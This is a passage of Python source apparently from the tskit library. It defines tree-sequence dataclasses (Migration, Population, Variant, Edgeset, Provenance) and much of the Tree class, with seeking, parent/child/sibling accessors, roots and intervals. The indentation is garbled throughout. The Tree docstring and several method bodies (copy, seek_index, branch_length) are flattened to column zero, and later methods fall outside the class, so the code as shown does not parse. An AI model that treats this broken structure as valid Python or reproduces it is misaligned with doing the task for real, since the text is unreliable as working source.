                    util.is_unknown_time(self.time) and util.is_unknown_time(other.time)
                )
            )
        )
@metadata_module.lazy_decode
@dataclass
class Migration(util.Dataclass):
    """
    A :ref:`migration <sec_migration_table_definition>` in a tree sequence.
    Modifying the attributes in this class will have **no effect** on the
    underlying tree sequence data.
    """
    __slots__ = ["left", "right", "node", "source", "dest", "time", "metadata", "id"]
    left: float
    """
    The left end of the genomic interval covered by this
    migration (inclusive).
    """
    right: float
    """
    The right end of the genomic interval covered by this migration
    (exclusive).
    """
    node: int
    """
    The integer ID of the node involved in this migration event.
    To obtain further information about a node with a given ID, use
    :meth:`TreeSequence.node`.
    """
    source: int
    """
    The source population ID.
    """
    dest: int
    """
    The destination population ID.
    """
    time: float
    """
    The time at which this migration occurred.
    """
    metadata: Optional[Union[bytes, dict]]
    """
    The :ref:`metadata <sec_metadata_definition>` for this migration, decoded if a schema
    applies.
    """
    id: int  # noqa A003
    """
    The integer ID of this migration. Varies from 0 to
    :attr:`TreeSequence.num_migrations` - 1.
    """
@metadata_module.lazy_decode
@dataclass
class Population(util.Dataclass):
    """
    A :ref:`population <sec_population_table_definition>` in a tree sequence.
    Modifying the attributes in this class will have **no effect** on the
    underlying tree sequence data.
    """
    # Populations carry no data of their own beyond an ID and metadata.
    __slots__ = ["id", "metadata"]
    id: int  # noqa A003
    """
    The integer ID of this population. Varies from 0 to
    :attr:`TreeSequence.num_populations` - 1.
    """
    metadata: Optional[Union[bytes, dict]]
    """
    The :ref:`metadata <sec_metadata_definition>` for this population, decoded if a
    schema applies.
    """
@dataclass
class Variant(util.Dataclass):
    """
    A variant represents the observed variation among samples
    for a given site. A variant consists (a) of a reference to the
    :class:`Site` instance in question; (b) the **alleles** that may be
    observed at the samples for this site; and (c) the **genotypes**
    mapping sample IDs to the observed alleles.
    Each element in the ``alleles`` tuple is a string, representing the
    actual observed state for a given sample. The ``alleles`` tuple is
    generated in one of two ways. The first (and default) way is for
    ``tskit`` to generate the encoding on the fly as alleles are encountered
    while generating genotypes. In this case, the first element of this
    tuple is guaranteed to be the same as the site's ``ancestral_state`` value
    and the list of alleles is also guaranteed not to contain any duplicates.
    Note that allelic values may be listed that are not referred to by any
    samples. For example, if we have a site that is fixed for the derived state
    (i.e., we have a mutation over the tree root), all genotypes will be 1, but
    the alleles list will be equal to ``('0', '1')``. Other than the
    ancestral state being the first allele, the alleles are listed in
    no particular order, and the ordering should not be relied upon
    (but see the notes on missing data below).
    The second way is for the user to define the mapping between
    genotype values and allelic state strings using the
    ``alleles`` parameter to the :meth:`TreeSequence.variants` method.
    In this case, there is no indication of which allele is the ancestral state,
    as the ordering is determined by the user.
    The ``genotypes`` represent the observed allelic states for each sample,
    such that ``var.alleles[var.genotypes[j]]`` gives the string allele
    for sample ID ``j``. Thus, the elements of the genotypes array are
    indexes into the ``alleles`` list. The genotypes are provided in this
    way via a numpy array to enable efficient calculations.
    When :ref:`missing data<sec_data_model_missing_data>` is present at a given
    site boolean flag ``has_missing_data`` will be True, at least one element
    of the ``genotypes`` array will be equal to ``tskit.MISSING_DATA``, and the
    last element of the ``alleles`` array will be ``None``. Note that in this
    case ``variant.num_alleles`` will **not** be equal to
    ``len(variant.alleles)``. The rationale for adding ``None`` to the end of
    the ``alleles`` list is to help code that does not handle missing data
    correctly fail early rather than introducing subtle and hard-to-find bugs.
    As ``tskit.MISSING_DATA`` is equal to -1, code that decodes genotypes into
    allelic values without taking missing data into account would otherwise
    output the last allele in the list rather missing data.
    Modifying the attributes in this class will have **no effect** on the
    underlying tree sequence data.
    """
    __slots__ = ["site", "alleles", "genotypes"]
    site: Site
    """
    The site object for this variant.
    """
    alleles: tuple
    """
    A tuple of the allelic values that may be observed at the
    samples at the current site. The first element of this tuple is always
    the site's ancestral state.
    """
    genotypes: np.ndarray
    """
    An array of indexes into the list ``alleles``, giving the
    state of each sample at the current site.
    """
    @property
    def has_missing_data(self):
        """
        True if there is missing data for any of the
        samples at the current site.
        """
        # A trailing None allele is the documented marker for missing data.
        return self.alleles[-1] is None
    @property
    def num_alleles(self):
        """
        The number of distinct alleles at this site. Note that
        this may be greater than the number of distinct values in the genotypes
        array.
        """
        # The trailing None placeholder (if any) is not a real allele, so
        # subtract it; bool subtracts as 0 or 1 here.
        return len(self.alleles) - self.has_missing_data
    # Deprecated alias to avoid breaking existing code.
    @property
    def position(self):
        return self.site.position
    # Deprecated alias to avoid breaking existing code.
    @property
    def index(self):
        return self.site.id
    # We need a custom eq because ``genotypes`` is a numpy array, which
    # cannot be compared with plain ==.
    def __eq__(self, other):
        return (
            isinstance(other, Variant)
            and self.site == other.site
            and self.alleles == other.alleles
            and np.array_equal(self.genotypes, other.genotypes)
        )
@dataclass
class Edgeset(util.Dataclass):
    """
    A parent node together with its children over the genomic interval
    ``[left, right)`` (by the half-open convention used elsewhere in this
    module).
    """

    __slots__ = ["left", "right", "parent", "children"]
    left: int
    right: int
    parent: int
    children: np.ndarray

    # ``children`` is a numpy array, so equality needs np.array_equal
    # rather than the dataclass-generated ==.
    def __eq__(self, other):
        if not isinstance(other, Edgeset):
            return False
        if self.left != other.left:
            return False
        if self.right != other.right:
            return False
        if self.parent != other.parent:
            return False
        return np.array_equal(self.children, other.children)
@dataclass
class Provenance(util.Dataclass):
    """
    A provenance entry: an integer ID, an ISO-style timestamp string and an
    opaque record string describing how the data was produced.
    """
    __slots__ = ["id", "timestamp", "record"]
    id: int  # noqa A003
    timestamp: str
    record: str
class Tree:
"""
A single tree in a :class:`TreeSequence`. Please see the
:ref:`sec_tutorial_moving_along_a_tree_sequence` section for information
on how efficiently access trees sequentially or obtain a list
of individual trees in a tree sequence.
The ``sample_lists`` parameter controls the features that are enabled
for this tree. If ``sample_lists`` is True a more efficient algorithm is
used in the :meth:`Tree.samples` method.
The ``tracked_samples`` parameter can be used to efficiently count the
number of samples in a given set that exist in a particular subtree
using the :meth:`Tree.num_tracked_samples` method.
The :class:`Tree` class is a state-machine which has a state
corresponding to each of the trees in the parent tree sequence. We
transition between these states by using the seek functions like
:meth:`Tree.first`, :meth:`Tree.last`, :meth:`Tree.seek` and
:meth:`Tree.seek_index`. There is one more state, the so-called "null"
or "cleared" state. This is the state that a :class:`Tree` is in
immediately after initialisation; it has an index of -1, and no edges. We
can also enter the null state by calling :meth:`Tree.next` on the last
tree in a sequence, calling :meth:`Tree.prev` on the first tree in a
sequence or calling calling the :meth:`Tree.clear` method at any time.
The high-level TreeSequence seeking and iterations methods (e.g,
:meth:`TreeSequence.trees`) are built on these low-level state-machine
seek operations. We recommend these higher level operations for most
users.
:param TreeSequence tree_sequence: The parent tree sequence.
:param list tracked_samples: The list of samples to be tracked and
counted using the :meth:`Tree.num_tracked_samples` method.
:param bool sample_lists: If True, provide more efficient access
to the samples beneath a give node using the
:meth:`Tree.samples` method.
:param int root_threshold: The minimum number of samples that a node
must be ancestral to for it to be in the list of roots. By default
this is 1, so that isolated samples (representing missing data)
are roots. To efficiently restrict the roots of the tree to
those subtending meaningful topology, set this to 2. This value
is only relevant when trees have multiple roots.
:param bool sample_counts: Deprecated since 0.2.4.
"""
    def __init__(
        self,
        tree_sequence,
        tracked_samples=None,
        *,
        sample_lists=False,
        root_threshold=1,
        sample_counts=None,
    ):
        # Bit flags forwarded to the low-level C tree constructor.
        options = 0
        if sample_counts is not None:
            # Deprecated option: warn but otherwise ignore it.
            warnings.warn(
                "The sample_counts option is not supported since 0.2.4 "
                "and is ignored",
                RuntimeWarning,
            )
        if sample_lists:
            options |= _tskit.SAMPLE_LISTS
        kwargs = {"options": options}
        if tracked_samples is not None:
            # TODO remove this when we allow numpy arrays in the low-level API.
            kwargs["tracked_samples"] = list(tracked_samples)
        self._tree_sequence = tree_sequence
        self._ll_tree = _tskit.Tree(tree_sequence.ll_tree_sequence, **kwargs)
        self._ll_tree.set_root_threshold(root_threshold)
        # Cache the quintuply-linked tree arrays exposed by the C object.
        self._make_arrays()
def copy(self):
"""
Returns a deep copy of this tree. The returned tree will have identical state
to this tree.
:return: A copy of this tree.
:rtype: Tree
"""
copy = type(self).__new__(type(self))
copy._tree_sequence = self._tree_sequence
copy._ll_tree = self._ll_tree.copy()
copy._make_arrays()
return copy
    def _make_arrays(self):
        # Store the low-level arrays for efficiency. There's no real overhead
        # in this, because they refer to the same underlying memory as the
        # tree object.
        self._parent_array = self._ll_tree.parent_array
        self._left_child_array = self._ll_tree.left_child_array
        self._right_child_array = self._ll_tree.right_child_array
        self._left_sib_array = self._ll_tree.left_sib_array
        self._right_sib_array = self._ll_tree.right_sib_array
    @property
    def tree_sequence(self):
        """
        Returns the tree sequence that this tree is from.
        :return: The parent tree sequence for this tree.
        :rtype: :class:`TreeSequence`
        """
        return self._tree_sequence
    @property
    def root_threshold(self):
        """
        Returns the minimum number of samples that a node must be an ancestor
        of to be considered a potential root.
        :return: The root threshold.
        :rtype: int
        """
        return self._ll_tree.get_root_threshold()
def __eq__(self, other):
ret = False
if type(other) is type(self):
ret = bool(self._ll_tree.equals(other._ll_tree))
return ret
def __ne__(self, other):
return not self.__eq__(other)
    def first(self):
        """
        Seeks to the first tree in the sequence. This can be called whether
        the tree is in the null state or not.
        """
        # Delegates directly to the low-level C tree.
        self._ll_tree.first()
    def last(self):
        """
        Seeks to the last tree in the sequence. This can be called whether
        the tree is in the null state or not.
        """
        self._ll_tree.last()
    def next(self):  # noqa A002
        """
        Seeks to the next tree in the sequence. If the tree is in the initial
        null state we seek to the first tree (equivalent to calling :meth:`.first`).
        Calling ``next`` on the last tree in the sequence results in the tree
        being cleared back into the null initial state (equivalent to calling
        :meth:`clear`). The return value of the function indicates whether the
        tree is in a non-null state, and can be used to loop over the trees::

            # Iterate over the trees from left-to-right
            tree = tskit.Tree(tree_sequence)
            while tree.next():
                # Do something with the tree.
                print(tree.index)
            # tree is now back in the null state.

        :return: True if the tree has been transformed into one of the trees
            in the sequence; False if the tree has been transformed into the
            null state.
        :rtype: bool
        """
        # bool() converts the low-level integer status flag.
        return bool(self._ll_tree.next())
    def prev(self):
        """
        Seeks to the previous tree in the sequence. If the tree is in the initial
        null state we seek to the last tree (equivalent to calling :meth:`.last`).
        Calling ``prev`` on the first tree in the sequence results in the tree
        being cleared back into the null initial state (equivalent to calling
        :meth:`clear`). The return value of the function indicates whether the
        tree is in a non-null state, and can be used to loop over the trees::

            # Iterate over the trees from right-to-left
            tree = tskit.Tree(tree_sequence)
            while tree.prev():
                # Do something with the tree.
                print(tree.index)
            # tree is now back in the null state.

        :return: True if the tree has been transformed into one of the trees
            in the sequence; False if the tree has been transformed into the
            null state.
        :rtype: bool
        """
        # bool() converts the low-level integer status flag.
        return bool(self._ll_tree.prev())
    def clear(self):
        """
        Resets this tree back to the initial null state. Calling this method
        on a tree already in the null state has no effect.
        """
        self._ll_tree.clear()
def seek_index(self, index):
"""
Sets the state to represent the tree at the specified
index in the parent tree sequence. Negative indexes following the
standard Python conventions are allowed, i.e., ``index=-1`` will
seek to the last tree in the sequence.
:param int index: The tree index to seek to.
:raises IndexError: If an index outside the acceptable range is provided.
"""
num_trees = self.tree_sequence.num_trees
if index < 0:
index += num_trees
if index < 0 or index >= num_trees:
raise IndexError("Index out of bounds")
# This should be implemented in C efficiently using the indexes.
# No point in complicating the current implementation by trying
# to seek from the correct direction.
self.first()
while self.index != index:
self.next()
    def seek(self, position):
        """
        Sets the state to represent the tree that covers the specified
        position in the parent tree sequence. After a successful return
        of this method we have ``tree.interval.left`` <= ``position``
        < ``tree.interval.right``.

        :param float position: The position along the sequence length to
            seek to.
        :raises ValueError: If position < 0 or position >=
            :attr:`TreeSequence.sequence_length`.
        """
        if position < 0 or position >= self.tree_sequence.sequence_length:
            raise ValueError("Position out of bounds")
        # This should be implemented in C efficiently using the indexes.
        # No point in complicating the current implementation by trying
        # to seek from the correct direction.
        self.first()
        while self.interval.right <= position:
            self.next()
    def rank(self):
        """
        Produce the rank of this tree in the enumeration of all leaf-labelled
        trees of n leaves. See the :ref:`sec_tree_ranks` section for
        details on ranking and unranking trees.
        :rtype: tuple(int)
        :raises ValueError: If the tree has multiple roots.
        """
        # The combinatorics module owns the ranking algorithm.
        return combinatorics.RankTree.from_tsk_tree(self).rank()
    @staticmethod
    def unrank(num_leaves, rank, *, span=1, branch_length=1):
        """
        Reconstruct the tree of the given ``rank``
        (see :meth:`tskit.Tree.rank`) with ``num_leaves`` leaves.
        The labels and times of internal nodes are assigned by a postorder
        traversal of the nodes, such that the time of each internal node
        is the maximum time of its children plus the specified ``branch_length``.
        The time of each leaf is 0.
        See the :ref:`sec_tree_ranks` section for details on ranking and
        unranking trees and what constitutes valid ranks.
        :param int num_leaves: The number of leaves of the tree to generate.
        :param tuple(int) rank: The rank of the tree to generate.
        :param float span: The genomic span of the returned tree. The tree will cover
            the interval :math:`[0, \\text{span})` and the :attr:`~Tree.tree_sequence`
            from which the tree is taken will have its
            :attr:`~tskit.TreeSequence.sequence_length` equal to ``span``.
        :param: float branch_length: The minimum length of a branch in this tree.
        :rtype: Tree
        :raises: ValueError: If the given rank is out of bounds for trees
            with ``num_leaves`` leaves.
        """
        rank_tree = combinatorics.RankTree.unrank(num_leaves, rank)
        return rank_tree.to_tsk_tree(span=span, branch_length=branch_length)
    def count_topologies(self, sample_sets=None):
        """
        Calculates the distribution of embedded topologies for every combination
        of the sample sets in ``sample_sets``. ``sample_sets`` defaults to all
        samples in the tree grouped by population.
        ``sample_sets`` need not include all samples but must be pairwise disjoint.
        The returned object is a :class:`tskit.TopologyCounter` that contains
        counts of topologies per combination of sample sets. For example,
        >>> topology_counter = tree.count_topologies()
        >>> rank, count = topology_counter[0, 1, 2].most_common(1)[0]
        produces the most common tree topology, with populations 0, 1
        and 2 as its tips, according to the genealogies of those
        populations' samples in this tree.
        The counts for each topology in the :class:`tskit.TopologyCounter`
        are absolute counts that we would get if we were to select all
        combinations of samples from the relevant sample sets.
        For sample sets :math:`[s_0, s_1, ..., s_n]`, the total number of
        topologies for those sample sets is equal to
        :math:`|s_0| * |s_1| * ... * |s_n|`, so the counts in the counter
        ``topology_counter[0, 1, ..., n]`` should sum to
        :math:`|s_0| * |s_1| * ... * |s_n|`.
        To convert the topology counts to probabilities, divide by the total
        possible number of sample combinations from the sample sets in question::
            >>> set_sizes = [len(sample_set) for sample_set in sample_sets]
            >>> p = count / (set_sizes[0] * set_sizes[1] * set_sizes[2])
        .. warning:: The interface for this method is preliminary and may be subject to
            backwards incompatible changes in the near future.
        :param list sample_sets: A list of lists of Node IDs, specifying the
            groups of nodes to compute the statistic with.
            Defaults to all samples grouped by population.
        :rtype: tskit.TopologyCounter
        :raises ValueError: If nodes in ``sample_sets`` are invalid or are
            internal samples.
        """
        if sample_sets is None:
            # Default: one sample set per population, in population-ID order.
            sample_sets = [
                self.tree_sequence.samples(population=pop.id)
                for pop in self.tree_sequence.populations()
            ]
        return combinatorics.tree_count_topologies(self, sample_sets)
def get_branch_length(self, u):
# Deprecated alias for branch_length
return self.branch_length(u)
def branch_length(self, u):
"""
Returns the length of the branch (in units of time) joining the
specified node to its parent. This is equivalent to
>>> tree.time(tree.parent(u)) - tree.time(u)
The branch length for a node that has no parent (e.g., a root) is
defined as zero.
Note that this is not related to the property `.length` which
is a deprecated alias for the genomic :attr:`~Tree.span` covered by a tree.
:param int u: The node of interest.
:return: The branch length from u to its parent.
:rtype: float
"""
ret = 0
parent = self.parent(u)
if parent != NULL:
ret = self.time(parent) - self.time(u)
return ret
def get_total_branch_length(self):
# Deprecated alias for total_branch_length
return self.total_branch_length
@property
def total_branch_length(self):
"""
Returns the sum of all the branch lengths in this tree (in
units of time). This is equivalent to
>>> sum(tree.branch_length(u) for u in tree.nodes())
Note that the branch lengths for root nodes are defined as zero.
As this is defined by a traversal of the tree, technically we
return the sum of all branch lengths that are reachable from
roots. Thus, this is the sum of all branches that are ancestral
to at least one sample. This distinction is only important
in tree sequences that contain 'dead branches', i.e., those
that define topology not ancestral to any samples.
:return: The sum of lengths of branches in this tree.
:rtype: float
"""
return sum(self.branch_length(u) for u in self.nodes())
    def get_mrca(self, u, v):
        # Deprecated alias for mrca
        return self.mrca(u, v)
    def mrca(self, u, v):
        """
        Returns the most recent common ancestor of the specified nodes.
        :param int u: The first node.
        :param int v: The second node.
        :return: The most recent common ancestor of u and v.
        :rtype: int
        """
        # Delegates to the low-level C tree.
        return self._ll_tree.get_mrca(u, v)
    def get_tmrca(self, u, v):
        # Deprecated alias for tmrca
        return self.tmrca(u, v)
    def tmrca(self, u, v):
        """
        Returns the time of the most recent common ancestor of the specified
        nodes. This is equivalent to::
            >>> tree.time(tree.mrca(u, v))
        :param int u: The first node.
        :param int v: The second node.
        :return: The time of the most recent common ancestor of u and v.
        :rtype: float
        """
        return self.get_time(self.get_mrca(u, v))
    def get_parent(self, u):
        # Deprecated alias for parent
        return self.parent(u)
    def parent(self, u):
        """
        Returns the parent of the specified node. Returns
        :data:`tskit.NULL` if u is a root or is not a node in
        the current tree.
        :param int u: The node of interest.
        :return: The parent of u.
        :rtype: int
        """
        return self._ll_tree.get_parent(u)
    @property
    def parent_array(self):
        """
        A numpy array (dtype=np.int32) encoding the parent of each node
        in this tree, such that ``tree.parent_array[u] == tree.parent(u)``
        for all ``0 <= u < ts.num_nodes``. See the :meth:`~.parent`
        method for details on the semantics of tree parents and the
        :ref:`sec_data_model_tree_structure` section for information on the
        quintuply linked tree encoding.
        .. warning:: |tree_array_warning|
        """
        # Cached by _make_arrays(); shares memory with the low-level tree.
        return self._parent_array
# Quintuply linked tree structure.
    def left_child(self, u):
        """
        Returns the leftmost child of the specified node. Returns
        :data:`tskit.NULL` if u is a leaf or is not a node in
        the current tree. The left-to-right ordering of children
        is arbitrary and should not be depended on; see the
        :ref:`data model <sec_data_model_tree_structure>` section
        for details.
        This is a low-level method giving access to the quintuply linked
        tree structure in memory; the :meth:`.children` method is a more
        convenient way to obtain the children of a given node.
        :param int u: The node of interest.
        :return: The leftmost child of u.
        :rtype: int
        """
        return self._ll_tree.get_left_child(u)
    @property
    def left_child_array(self):
        """
        A numpy array (dtype=np.int32) encoding the left child of each node
        in this tree, such that ``tree.left_child_array[u] == tree.left_child(u)``
        for all ``0 <= u < ts.num_nodes``. See the :meth:`~.left_child`
        method for details on the semantics of tree left_child and the
        :ref:`sec_data_model_tree_structure` section for information on the
        quintuply linked tree encoding.
        .. warning:: |tree_array_warning|
        """
        # Cached by _make_arrays(); shares memory with the low-level tree.
        return self._left_child_array
def right_child(self, u):
"""
Returns the rightmost child of the specified node. Returns
:data:`tskit.NULL` if u is a leaf or is not a node in
the current tree. The left-to-right ordering of children
is arbitrary and should not be depended on; see the
:ref:`data model <sec_data_model_tree_structure>` section
for details.
This is a low-level method giving access to the quintuply linked
tree structure in memory; the :meth:`.children` method is a more
convenient way to obtain the children of a given node.
:param int u: The node of interest.
:return: The rightmost child of u.
:rtype: int
"""
return self._ll_tree.get_right_child(u)
@property
def right_child_array(self):
    """
    A numpy array (dtype=np.int32) encoding the right child of each node
    in this tree, such that ``tree.right_child_array[u] == tree.right_child(u)``
    for all ``0 <= u < ts.num_nodes``. See the :meth:`~.right_child`
    method for details on the semantics of tree right_child and the
    :ref:`sec_data_model_tree_structure` section for information on the
    quintuply linked tree encoding.

    .. warning:: |tree_array_warning|
    """
    # Cached array view; see the class for where _right_child_array is set.
    return self._right_child_array
def left_sib(self, u):
    """
    Returns the sibling node to the left of u, or :data:`tskit.NULL`
    if u does not have a left sibling.
    The left-to-right ordering of children
    is arbitrary and should not be depended on; see the
    :ref:`data model <sec_data_model_tree_structure>` section
    for details.

    :param int u: The node of interest.
    :return: The sibling node to the left of u.
    :rtype: int
    """
    # O(1) delegation to the C-level quintuply linked tree.
    return self._ll_tree.get_left_sib(u)
@property
def left_sib_array(self):
    """
    A numpy array (dtype=np.int32) encoding the left sib of each node
    in this tree, such that ``tree.left_sib_array[u] == tree.left_sib(u)``
    for all ``0 <= u < ts.num_nodes``. See the :meth:`~.left_sib`
    method for details on the semantics of tree left_sib and the
    :ref:`sec_data_model_tree_structure` section for information on the
    quintuply linked tree encoding.

    .. warning:: |tree_array_warning|
    """
    # Cached array view; see the class for where _left_sib_array is set.
    return self._left_sib_array
def right_sib(self, u):
    """
    Returns the sibling node to the right of u, or :data:`tskit.NULL`
    if u does not have a right sibling.
    The left-to-right ordering of children
    is arbitrary and should not be depended on; see the
    :ref:`data model <sec_data_model_tree_structure>` section
    for details.

    :param int u: The node of interest.
    :return: The sibling node to the right of u.
    :rtype: int
    """
    # O(1) delegation to the C-level quintuply linked tree.
    return self._ll_tree.get_right_sib(u)
@property
def right_sib_array(self):
    """
    A numpy array (dtype=np.int32) encoding the right sib of each node
    in this tree, such that ``tree.right_sib_array[u] == tree.right_sib(u)``
    for all ``0 <= u < ts.num_nodes``. See the :meth:`~.right_sib`
    method for details on the semantics of tree right_sib and the
    :ref:`sec_data_model_tree_structure` section for information on the
    quintuply linked tree encoding.

    .. warning:: |tree_array_warning|
    """
    # Cached array view; see the class for where _right_sib_array is set.
    return self._right_sib_array
# Sample list.
def left_sample(self, u):
    # Index (into the tree sequence's sample list) of the first sample in
    # the linked sample list for node u; see _sample_generator for usage.
    return self._ll_tree.get_left_sample(u)
def right_sample(self, u):
    # Index of the last sample in the linked sample list for node u;
    # see _sample_generator for usage.
    return self._ll_tree.get_right_sample(u)
def next_sample(self, u):
    # Successor of sample-list index u in the linked sample list;
    # see _sample_generator for usage.
    return self._ll_tree.get_next_sample(u)
# TODO do we also have right_root?
@property
def left_root(self):
    """
    The leftmost root in this tree. If there are multiple roots
    in this tree, they are siblings of this node, and so we can
    use :meth:`.right_sib` to iterate over all roots:

    .. code-block:: python

        u = tree.left_root
        while u != tskit.NULL:
            print("Root:", u)
            u = tree.right_sib(u)

    The left-to-right ordering of roots is arbitrary and should
    not be depended on; see the
    :ref:`data model <sec_data_model_tree_structure>`
    section for details.

    This is a low-level method giving access to the quintuply linked
    tree structure in memory; the :attr:`~Tree.roots` attribute is a more
    convenient way to obtain the roots of a tree. If you are assuming
    that there is a single root in the tree you should use the
    :attr:`~Tree.root` property.

    .. warning:: Do not use this property if you are assuming that there
        is a single root in trees that are being processed. The
        :attr:`~Tree.root` property should be used in this case, as it will
        raise an error when multiple roots exists.

    :rtype: int
    """
    return self._ll_tree.get_left_root()
def get_children(self, u):
    # Deprecated alias for self.children
    return self.children(u)
def children(self, u):
    """
    Returns the children of the specified node ``u`` as a tuple of integer node IDs.
    If ``u`` is a leaf, return the empty tuple. The ordering of children
    is arbitrary and should not be depended on; see the
    :ref:`data model <sec_data_model_tree_structure>` section
    for details.

    :param int u: The node of interest.
    :return: The children of ``u`` as a tuple of integers
    :rtype: tuple(int)
    """
    # Delegates to the C-level tree, which materialises the tuple.
    return self._ll_tree.get_children(u)
def get_time(self, u):
    # Deprecated alias for self.time
    return self.time(u)
def time(self, u):
    """
    Returns the time of the specified node.
    Equivalent to ``tree.tree_sequence.node(u).time``.

    :param int u: The node of interest.
    :return: The time of u.
    :rtype: float
    """
    return self._ll_tree.get_time(u)
def depth(self, u):
    """
    Returns the number of nodes on the path from ``u`` to a
    root, not including ``u``. Thus, the depth of a root is
    zero.

    :param int u: The node of interest.
    :return: The depth of u.
    :rtype: int
    """
    return self._ll_tree.depth(u)
def get_population(self, u):
    # Deprecated alias for self.population
    return self.population(u)
def population(self, u):
    """
    Returns the population associated with the specified node.
    Equivalent to ``tree.tree_sequence.node(u).population``.

    :param int u: The node of interest.
    :return: The ID of the population associated with node u.
    :rtype: int
    """
    return self._ll_tree.get_population(u)
def is_internal(self, u):
    """
    Returns True if the specified node is not a leaf. A node is internal
    if it has one or more children in the current tree.

    :param int u: The node of interest.
    :return: True if u is not a leaf node.
    :rtype: bool
    """
    # Defined as the exact complement of is_leaf.
    return not self.is_leaf(u)
def is_leaf(self, u):
    """
    Returns True if the specified node is a leaf. A node :math:`u` is a
    leaf if it has zero children.

    :param int u: The node of interest.
    :return: True if u is a leaf node.
    :rtype: bool
    """
    # A node is a leaf exactly when its children tuple is empty.
    return not self.children(u)
def is_isolated(self, u):
    """
    Returns True if the specified node is isolated in this tree: that is
    it has no parents and no children. Sample nodes that are isolated
    and have no mutations above them are used to represent
    :ref:`missing data<sec_data_model_missing_data>`.

    :param int u: The node of interest.
    :return: True if u is an isolated node.
    :rtype: bool
    """
    # Isolated means no edge above (no parent) and no edges below (no
    # children); both checks are pure and side-effect free.
    return self.parent(u) == NULL and self.num_children(u) == 0
def is_sample(self, u):
    """
    Returns True if the specified node is a sample. A node :math:`u` is a
    sample if it has been marked as a sample in the parent tree sequence.

    :param int u: The node of interest.
    :return: True if u is a sample.
    :rtype: bool
    """
    # bool() converts the C-level 0/1 flag into a Python bool.
    return bool(self._ll_tree.is_sample(u))
def is_descendant(self, u, v):
    """
    Returns True if the specified node u is a descendant of node v and False
    otherwise. A node :math:`u` is a descendant of another node :math:`v` if
    :math:`v` is on the path from :math:`u` to root. A node is considered
    to be a descendant of itself, so ``tree.is_descendant(u, u)`` will be
    True for any valid node.

    :param int u: The descendant node.
    :param int v: The ancestral node.
    :return: True if u is a descendant of v.
    :rtype: bool
    :raises ValueError: If u or v are not valid node IDs.
    """
    # bool() converts the C-level 0/1 flag into a Python bool.
    return bool(self._ll_tree.is_descendant(u, v))
@property
def num_nodes(self):
    """
    Returns the number of nodes in the :class:`TreeSequence` this tree is in.
    Equivalent to ``tree.tree_sequence.num_nodes``. To find the number of
    nodes that are reachable from all roots use ``len(list(tree.nodes()))``.

    :rtype: int
    """
    return self._ll_tree.get_num_nodes()
@property
def num_roots(self):
    """
    The number of roots in this tree, as defined in the :attr:`~Tree.roots`
    attribute.

    Only requires O(number of roots) time.

    :rtype: int
    """
    return self._ll_tree.get_num_roots()
@property
def has_single_root(self):
    """
    ``True`` if this tree has a single root, ``False`` otherwise.
    Equivalent to tree.num_roots == 1. This is a O(1) operation.

    :rtype: bool
    """
    # Exactly one root: a leftmost root exists and it has no right sibling.
    leftmost = self.left_root
    return leftmost != NULL and self.right_sib(leftmost) == NULL
@property
def has_multiple_roots(self):
    """
    ``True`` if this tree has more than one root, ``False`` otherwise.
    Equivalent to tree.num_roots > 1. This is a O(1) operation.

    :rtype: bool
    """
    # More than one root: the leftmost root exists and has a right sibling.
    leftmost = self.left_root
    return leftmost != NULL and self.right_sib(leftmost) != NULL
@property
def roots(self):
    """
    The list of roots in this tree. A root is defined as a unique endpoint of
    the paths starting at samples. We can define the set of roots as follows:

    .. code-block:: python

        roots = set()
        for u in tree_sequence.samples():
            while tree.parent(u) != tskit.NULL:
                u = tree.parent(u)
            roots.add(u)
        # roots is now the set of all roots in this tree.
        assert sorted(roots) == sorted(tree.roots)

    The roots of the tree are returned in a list, in no particular order.

    Only requires O(number of roots) time.

    :return: The list of roots in this tree.
    :rtype: list
    """
    # Walk the sibling chain starting at the leftmost root; all roots
    # are siblings of each other in the quintuply linked encoding.
    result = []
    node = self.left_root
    while node != NULL:
        result.append(node)
        node = self.right_sib(node)
    return result
def get_root(self):
    # Deprecated alias for self.root
    return self.root
@property
def root(self):
    """
    The root of this tree. If the tree contains multiple roots, a ValueError is
    raised indicating that the :attr:`~Tree.roots` attribute should be used instead.

    :return: The root node.
    :rtype: int
    :raises: :class:`ValueError` if this tree contains more than one root.
    """
    # Guard clause: succeed fast in the common single-root case.
    if not self.has_multiple_roots:
        return self.left_root
    raise ValueError("More than one root exists. Use tree.roots instead")
def get_index(self):
    # Deprecated alias for self.index
    return self.index
@property
def index(self):
    """
    Returns the index this tree occupies in the parent tree sequence.
    This index is zero based, so the first tree in the sequence has index 0.

    :return: The index of this tree.
    :rtype: int
    """
    return self._ll_tree.get_index()
def get_interval(self):
    # Deprecated alias for self.interval
    return self.interval
@property
def interval(self):
    """
    Returns the coordinates of the genomic interval that this tree
    represents the history of. The interval is returned as a tuple
    :math:`(l, r)` and is a half-open interval such that the left
    coordinate is inclusive and the right coordinate is exclusive. This
    tree therefore applies to all genomic locations :math:`x` such that
    :math:`l \\leq x < r`.

    :return: A named tuple (l, r) representing the left-most (inclusive)
        and right-most (exclusive) coordinates of the genomic region
        covered by this tree. The coordinates can be accessed by index
        (``0`` or ``1``) or equivalently by name (``.left`` or ``.right``)
    :rtype: tuple
    """
    # Wrap the raw C-level coordinates in the named-tuple Interval type.
    return Interval(self._ll_tree.get_left(), self._ll_tree.get_right())
def get_length(self):
    # Deprecated alias for self.span. Previously this routed through the
    # (also deprecated) self.length alias; delegate to span directly for
    # consistency with the comment. The returned value is unchanged.
    return self.span
@property
def length(self):
    # Deprecated alias for self.span
    return self.span
@property
def span(self):
    """
    Returns the genomic distance that this tree spans.
    This is defined as :math:`r - l`, where :math:`(l, r)` is the genomic
    interval returned by :attr:`~Tree.interval`.

    :return: The genomic distance covered by this tree.
    :rtype: float
    """
    # Use the canonical interval property rather than the deprecated
    # get_interval() alias; the computed value is identical.
    interval = self.interval
    return interval.right - interval.left
# The sample_size (or num_samples) is really a property of the tree sequence,
# and so we should provide access to this via a tree.tree_sequence.num_samples
# property access. However, we can't just remove the method as a lot of code
# may depend on it. To complicate things a bit more, sample_size has been
# changed to num_samples elsewhere for consistency. We can't do this here
# because there is already a num_samples method which returns the number of
# samples below a particular node. The best thing to do is probably to
# undocument the sample_size property, but keep it around for ever.
def get_sample_size(self):
    # Deprecated alias for self.sample_size
    return self.sample_size
@property
def sample_size(self):
    """
    Returns the sample size for this tree. This is the number of sample
    nodes in the tree.

    :return: The number of sample nodes in the tree.
    :rtype: int
    """
    return self._ll_tree.get_sample_size()
def draw_text(self, orientation=None, **kwargs):
    """
    Return a text rendering of this tree. The ``orientation`` argument
    selects the direction in which the tree is drawn; remaining keyword
